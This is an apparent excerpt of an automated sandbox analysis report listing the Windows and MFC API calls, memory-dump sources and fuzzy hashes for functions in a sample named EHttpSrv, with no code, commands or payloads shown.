                                                                                                                • Instruction ID: 88d285f7ef9232bd13c2742594fa65263f5fded8ba666aec868e8f2817e94b27
                                                                                                                • Opcode Fuzzy Hash: 7078abcdab72a5927a4393b918f6e8bfa50432065ef7b6eb6b3f10c921c9fd8d
                                                                                                                • Instruction Fuzzy Hash: 71226D706087419FC328CF54C884B9EB7E5BFC8718F148A1DE589973A1EB39E945CB92
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22), ref: 20456B76
                                                                                                                • wcsncmp.MSVCR80 ref: 20456BE7
                                                                                                                • wcsncmp.MSVCR80 ref: 20456C30
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 20456C6A
                                                                                                                • #1079.MFC80U(?,000000FF,?), ref: 20456CAD
                                                                                                                • DestroyCursor.USER32(?), ref: 20456CC8
                                                                                                                • #1176.MFC80U ref: 20456CD0
                                                                                                                • #776.MFC80U(?), ref: 20456CE6
                                                                                                                • #3873.MFC80U(00000003,00000000,?,00000000,00000000,?,00000000), ref: 20456D08
                                                                                                                • #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000003,00000000,?,00000000,00000000,?,00000000), ref: 20456D2B
                                                                                                                • #5742.MFC80U(00000000,?,00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000003,00000000,?,00000000,00000000,?), ref: 20456D54
                                                                                                                • #578.MFC80U ref: 20456D68
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcsncmp$#1079#1176#310#3873#5742#578#5862#776CursorDestroyMetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 2983318147-0
                                                                                                                • Opcode ID: df40070d9e11cebbc4bc20e8484811a6a1918f87f31f53d7c45df4982caf299f
                                                                                                                • Instruction ID: 0f5dce3006ddcc1ef1741309668cc9dd9b75293bf3990993e7b0e2430c6244d5
                                                                                                                • Opcode Fuzzy Hash: df40070d9e11cebbc4bc20e8484811a6a1918f87f31f53d7c45df4982caf299f
                                                                                                                • Instruction Fuzzy Hash: 8B61AC702046409FD325CF58CC85FAABBF4FFA4708F14C92CF5899B2A1DA79A949CB51
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#4026malloc$#314#5149#5398#6751#776memcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514184627-0
                                                                                                                • Opcode ID: e0af06da38e8e88c1d8ed24109c85972f927e8b9e46c05c85569cbfc213e785a
                                                                                                                • Instruction ID: a3871e1fa572c28fd4509d55f6bb605b9d4f9b45c5f3229d0466ee6b1d63206c
                                                                                                                • Opcode Fuzzy Hash: e0af06da38e8e88c1d8ed24109c85972f927e8b9e46c05c85569cbfc213e785a
                                                                                                                • Instruction Fuzzy Hash: 8861AD715087809FD710DFA5CC85BAAB7E5FB88704F10C92DFA55832A0DB78A904CF62
                                                                                                                APIs
                                                                                                                • #310.MFC80U(FEEA6C22,?,00000000,?,76945540), ref: 204603E6
                                                                                                                • #578.MFC80U ref: 20460435
                                                                                                                • wcsncmp.MSVCR80 ref: 2046047D
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 204604B3
                                                                                                                • #1079.MFC80U(?,000000FF,?,?,?,?,76945540), ref: 204604F5
                                                                                                                • DestroyCursor.USER32(?), ref: 20460510
                                                                                                                • #1176.MFC80U(?,00000000,?,76945540), ref: 20460518
                                                                                                                • #776.MFC80U(?,?,00000000,?,76945540), ref: 2046052E
                                                                                                                • #3873.MFC80U(00000003,00000000,?,00000000,00000000,?,00000000,?,00000000,?,76945540), ref: 2046054C
                                                                                                                • #5862.MFC80U(00000000,00000001,00000003,00000000,?,00000000,00000000,00000000,00000003,00000000,?,00000000,00000000,?,00000000), ref: 20460573
                                                                                                                • #5862.MFC80U(00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000000,00000001,00000003,00000000,?,00000000,00000000,00000000), ref: 2046058F
                                                                                                                • #5742.MFC80U(00000000,?,00000000,00000000,00000004,00000000,00000000,00000000,00000000,?,00000000,00000001,00000003,00000000,?,00000000), ref: 204605BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5862$#1079#1176#310#3873#5742#578#776CursorDestroyMetricsSystemwcsncmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 3302704164-0
                                                                                                                • Opcode ID: 3af1b515dbe88e41baed38889e6274dd96d1c0b63390f4931c7d397ec4fd712e
                                                                                                                • Instruction ID: e655a11d792ebcd762c5dd361449a7858fca1bb5e6c4c7b92106669b91eedbf7
                                                                                                                • Opcode Fuzzy Hash: 3af1b515dbe88e41baed38889e6274dd96d1c0b63390f4931c7d397ec4fd712e
                                                                                                                • Instruction Fuzzy Hash: 23519D71204200AFD720DF58CC85FABB7E4EB94B18F10852CF55A9B2E1EA74A905CB92
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20422860
                                                                                                                  • Part of subcall function 204229E0: #1172.MFC80U(00000002,?,20422877,00000000), ref: 204229EF
                                                                                                                  • Part of subcall function 204229E0: #2297.MFC80U(20422877,00000000), ref: 20422A01
                                                                                                                • memset.MSVCR80 ref: 20422880
                                                                                                                • SendMessageW.USER32(?,0000120B,00000000,00000001), ref: 204228A9
                                                                                                                • #2297.MFC80U ref: 204228CA
                                                                                                                • #1172.MFC80U(00000002,?), ref: 204228F0
                                                                                                                • #1172.MFC80U(00000004,?), ref: 204228FF
                                                                                                                • #2250.MFC80U(?), ref: 20422919
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 2042293A
                                                                                                                • memset.MSVCR80 ref: 2042294D
                                                                                                                • #2250.MFC80U(?), ref: 20422982
                                                                                                                • SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 204229A9
                                                                                                                • #1172.MFC80U(00000004,?), ref: 204229C5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1172MessageSend$#2250#2297memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3378238609-0
                                                                                                                • Opcode ID: afb921a6bfa35ca6af43e91272ea4f8e23dea9fb3b4ca6c89f579d6df1a2ef5b
                                                                                                                • Instruction ID: ee6b70ef37af77f9597e7430c461b6aaa80c611ab22c3ef0fc82afac96ed4d41
                                                                                                                • Opcode Fuzzy Hash: afb921a6bfa35ca6af43e91272ea4f8e23dea9fb3b4ca6c89f579d6df1a2ef5b
                                                                                                                • Instruction Fuzzy Hash: C651B0B1700701AFD324DF94DD81F5AB3E5AF98B14F008A1CFA85973A1C679E845CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20462D50: #280.MFC80U(?,?,00000001,00000000,00000000), ref: 20462E3B
                                                                                                                  • Part of subcall function 20464070: #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 2046407B
                                                                                                                  • Part of subcall function 20464070: #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 20464094
                                                                                                                  • Part of subcall function 20464070: #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 204640B3
                                                                                                                  • Part of subcall function 20464070: #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 204640D8
                                                                                                                  • Part of subcall function 20464070: #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 204640FD
                                                                                                                  • Part of subcall function 20464070: #764.MFC80U(?,?,20462A82,?,?,00000000,?,?), ref: 20464122
                                                                                                                • LeaveCriticalSection.KERNEL32(FEEA6C6A,FEEA6C22,?), ref: 20463AB0
                                                                                                                • #310.MFC80U(?,?,?), ref: 20463AE1
                                                                                                                • #310.MFC80U ref: 20463AF4
                                                                                                                • #4026.MFC80U(0000010A), ref: 20463B0B
                                                                                                                • #4026.MFC80U(000000B2), ref: 20463B1A
                                                                                                                • MessageBoxW.USER32(?,?,?,00000010), ref: 20463B30
                                                                                                                • #578.MFC80U ref: 20463B41
                                                                                                                • #578.MFC80U ref: 20463B53
                                                                                                                • #764.MFC80U(?,?,?,?,?), ref: 20463B81
                                                                                                                • #764.MFC80U(?,?,?,?,?), ref: 20463B9E
                                                                                                                • #764.MFC80U(?), ref: 20463BE9
                                                                                                                • #764.MFC80U(?), ref: 20463C06
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#310#4026#578$#280CriticalLeaveMessageSection
                                                                                                                • String ID:
                                                                                                                • API String ID: 2973313494-0
                                                                                                                • Opcode ID: 9e43e74d3b180e849e7b8f271b79c6a4d1b3ee825b3198810ae2759cbfd07b9a
                                                                                                                • Instruction ID: ee1d5e9c90d640d4341dbb6dcc14695c9230ec3ee3bf4f8633e53d7b4d4977cd
                                                                                                                • Opcode Fuzzy Hash: 9e43e74d3b180e849e7b8f271b79c6a4d1b3ee825b3198810ae2759cbfd07b9a
                                                                                                                • Instruction Fuzzy Hash: 7E5160B150D3809FD360DF68C885B9BBBE4BF95B14F408E2DF49983291EB399508CB52
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20437E75
                                                                                                                • #2362.MFC80U(00000000), ref: 20437E7C
                                                                                                                • SendMessageW.USER32(?,00000030,?,00000001), ref: 20437ED1
                                                                                                                • GetDC.USER32(?), ref: 20437EDB
                                                                                                                • #2361.MFC80U(00000000,?,00000000,00000000), ref: 20437EE2
                                                                                                                • #6735.MFC80U(2048BFA8,00000000,?,00000000,00000000), ref: 20437EF2
                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,?,?), ref: 20437F0E
                                                                                                                • #578.MFC80U ref: 20437F20
                                                                                                                • ReleaseDC.USER32(?,?), ref: 20437F2E
                                                                                                                • #1589.MFC80U(56000000,?,?,00000001), ref: 20437F6F
                                                                                                                • #4109.MFC80U(00000000,00001037,00000000,56000000,?,?,00000001), ref: 20437F7D
                                                                                                                • SendMessageW.USER32(?,00000030,?,00000001), ref: 20437F9D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#1589#2361#2362#4109#578#6735ExtentPoint32ReleaseText
                                                                                                                • String ID:
                                                                                                                • API String ID: 1012144733-0
                                                                                                                • Opcode ID: e50f7c94212ff6f5d697219102073ff2318caf2ec7eb8580bd8e728f966c0eac
                                                                                                                • Instruction ID: 3c6159516b36b2f4c95998dc5ab0c2ea471dd7729f0dd008a82ae6d364e421e3
                                                                                                                • Opcode Fuzzy Hash: e50f7c94212ff6f5d697219102073ff2318caf2ec7eb8580bd8e728f966c0eac
                                                                                                                • Instruction Fuzzy Hash: F65125B1508701AFD314DFA4C8C4E6AB7E8FB88718F508A2DF59A97650DB78E904CB51
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 2042591B
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20425935
                                                                                                                • #310.MFC80U ref: 20425963
                                                                                                                • #2311.MFC80U(?,2048587C,?), ref: 2042597F
                                                                                                                • #6063.MFC80U(20485878), ref: 2042599F
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 204259B4
                                                                                                                • #6063.MFC80U(?), ref: 204259DB
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 204259F0
                                                                                                                • #6063.MFC80U(?), ref: 20425A1D
                                                                                                                • #578.MFC80U ref: 20425A35
                                                                                                                • #6063.MFC80U(20485878), ref: 20425A5D
                                                                                                                • #6063.MFC80U(20485878,20485878), ref: 20425A6D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6063$MessageSend$#2311#310#578
                                                                                                                • String ID:
                                                                                                                • API String ID: 2015696880-0
                                                                                                                • Opcode ID: f6d7724b27683941b8b5eada9326c8c590702085192de9e58ad1dd4513675fa0
                                                                                                                • Instruction ID: 582b9dc04473b64b519ac912cf7b71737fc35bebc9d7e7eb96b471d9d28eae63
                                                                                                                • Opcode Fuzzy Hash: f6d7724b27683941b8b5eada9326c8c590702085192de9e58ad1dd4513675fa0
                                                                                                                • Instruction Fuzzy Hash: E74124312483869BD734DF54CC91FDA77A8FB84714F108A2DF9899BAE0DB79A904CB41
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20436504
                                                                                                                • SendMessageW.USER32(?,0000110A,00000005,00000000), ref: 20436517
                                                                                                                • GetClientRect.USER32(?,?), ref: 2043652C
                                                                                                                • #2870.MFC80U(00000000,?,00000001,?,00000000), ref: 20436540
                                                                                                                • SendMessageW.USER32(?,0000120B), ref: 2043656A
                                                                                                                  • Part of subcall function 20436160: #2872.MFC80U(00000000,00000002,FEEA6C22,?,00000000,00000000,?), ref: 204361BF
                                                                                                                  • Part of subcall function 20436160: GetSysColor.USER32(00000005), ref: 2043627F
                                                                                                                  • Part of subcall function 20436160: GetSysColor.USER32(0000000E), ref: 2043629B
                                                                                                                  • Part of subcall function 20436160: #2255.MFC80U(?,00000000,?,00000000,00000000,?), ref: 204362A9
                                                                                                                  • Part of subcall function 20436160: GetCurrentObject.GDI32(?,00000006), ref: 204362F1
                                                                                                                  • Part of subcall function 20436160: #2362.MFC80U(00000000,?,00000000,00000000,?), ref: 204362F8
                                                                                                                • SendMessageW.USER32(?,0000110A,00000006,00000000), ref: 204365A9
                                                                                                                • GetFocus.USER32 ref: 204365BF
                                                                                                                • #2366.MFC80U(00000000,?,00000000), ref: 204365C6
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 204365DC
                                                                                                                • #2870.MFC80U(00000000,?,00000001,?,00000000), ref: 204365EC
                                                                                                                • SendMessageW.USER32(?,00001207,-000000FE,?), ref: 2043660A
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 20436621
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#2870ColorFocusRect$#2255#2362#2366#2872ClientCurrentDrawObject
                                                                                                                • String ID:
                                                                                                                • API String ID: 1541409541-0
                                                                                                                • Opcode ID: b40490253f37213525eb9d32132aba65a2ad5db0a5ce1d1269bff6341410bc55
                                                                                                                • Instruction ID: c517e2def2d85d5d604394ba5021e36b664c3c92d93ee0bf02585ee706479133
                                                                                                                • Opcode Fuzzy Hash: b40490253f37213525eb9d32132aba65a2ad5db0a5ce1d1269bff6341410bc55
                                                                                                                • Instruction Fuzzy Hash: A2413EB1604306AFD704DFA4CC85F6BBBA9FB88B05F10891DF68597681DBB5E804CB91
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#310#578#6063$#2311#4026#4574
                                                                                                                • String ID:
                                                                                                                • API String ID: 3542734806-0
                                                                                                                • Opcode ID: 78384c6e0946633d7676bbfd93b0f125e38c0116b58ab90867058bc92283b960
                                                                                                                • Instruction ID: 42403b73f26213ef6e87cd317a585e460af4d5e690aa4c1b2616b82490cc4c81
                                                                                                                • Opcode Fuzzy Hash: 78384c6e0946633d7676bbfd93b0f125e38c0116b58ab90867058bc92283b960
                                                                                                                • Instruction Fuzzy Hash: 714113311487419FC724DF10CC94BAB7BE8FB88319F008A2DF959976E0DB39A908CB51
                                                                                                                APIs
                                                                                                                • #1894.MFC80U ref: 20433F6E
                                                                                                                • SetCapture.USER32(?), ref: 20433F84
                                                                                                                • #2366.MFC80U(00000000), ref: 20433F8B
                                                                                                                • GetFocus.USER32 ref: 20433F90
                                                                                                                • #2366.MFC80U(00000000), ref: 20433F97
                                                                                                                • #5829.MFC80U(00000000), ref: 20433FAE
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,00000000), ref: 20433FED
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,00000000), ref: 20433FFA
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,00000000), ref: 20434007
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 2043402E
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 2043403B
                                                                                                                • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 20434048
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateRect$#2366$#1894#5829CaptureFocus
                                                                                                                • String ID:
                                                                                                                • API String ID: 1167244330-0
                                                                                                                • Opcode ID: 068da07438faabc6f6d6ae5bffaeecf7222d5a751c470430f498ef03d4065304
                                                                                                                • Instruction ID: 7faf8ccecfcd7332bc059641ffefd81bea4cb990eec4ec3de1a958530146c04d
                                                                                                                • Opcode Fuzzy Hash: 068da07438faabc6f6d6ae5bffaeecf7222d5a751c470430f498ef03d4065304
                                                                                                                • Instruction Fuzzy Hash: 9B316071204700ABD214DBB5CC85FA7B3E9FBC8704F948A0CF69A97290EA75F905CB61
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp
                                                                                                                • String ID: 1.0$<$ENCODING$UTF-8$VERSION$XML
                                                                                                                • API String ID: 2081463915-2306877985
                                                                                                                • Opcode ID: c7f5506fce8cae5a84be547d077c7318a93c7e49eb3425ea1b743a19214ccfad
                                                                                                                • Instruction ID: 1d0823a0a285932af6489363e0feb85522811e26584ceb1749aba48eb4484664
                                                                                                                • Opcode Fuzzy Hash: c7f5506fce8cae5a84be547d077c7318a93c7e49eb3425ea1b743a19214ccfad
                                                                                                                • Instruction Fuzzy Hash: FDD17E71A083428BD718DFA4C88079A77E6BF84258F40C93DFC95A7761E738DD458B82
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2043A1C0: free.MSVCR80 ref: 2043A200
                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 2043A504
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 2043A535
                                                                                                                • malloc.MSVCR80 ref: 2043A566
                                                                                                                  • Part of subcall function 2043D430: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,00000000,2043F01E,00000000,00000001,00000000), ref: 2043D466
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,?,?,?,?), ref: 2043A5FB
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 2043A639
                                                                                                                • free.MSVCR80 ref: 2043A652
                                                                                                                • malloc.MSVCR80 ref: 2043A678
                                                                                                                • memcpy.MSVCR80(?,?,?,?,?,?,?,?,?), ref: 2043A69B
                                                                                                                • free.MSVCR80 ref: 2043A6BE
                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 2043A6F4
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000), ref: 2043A720
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
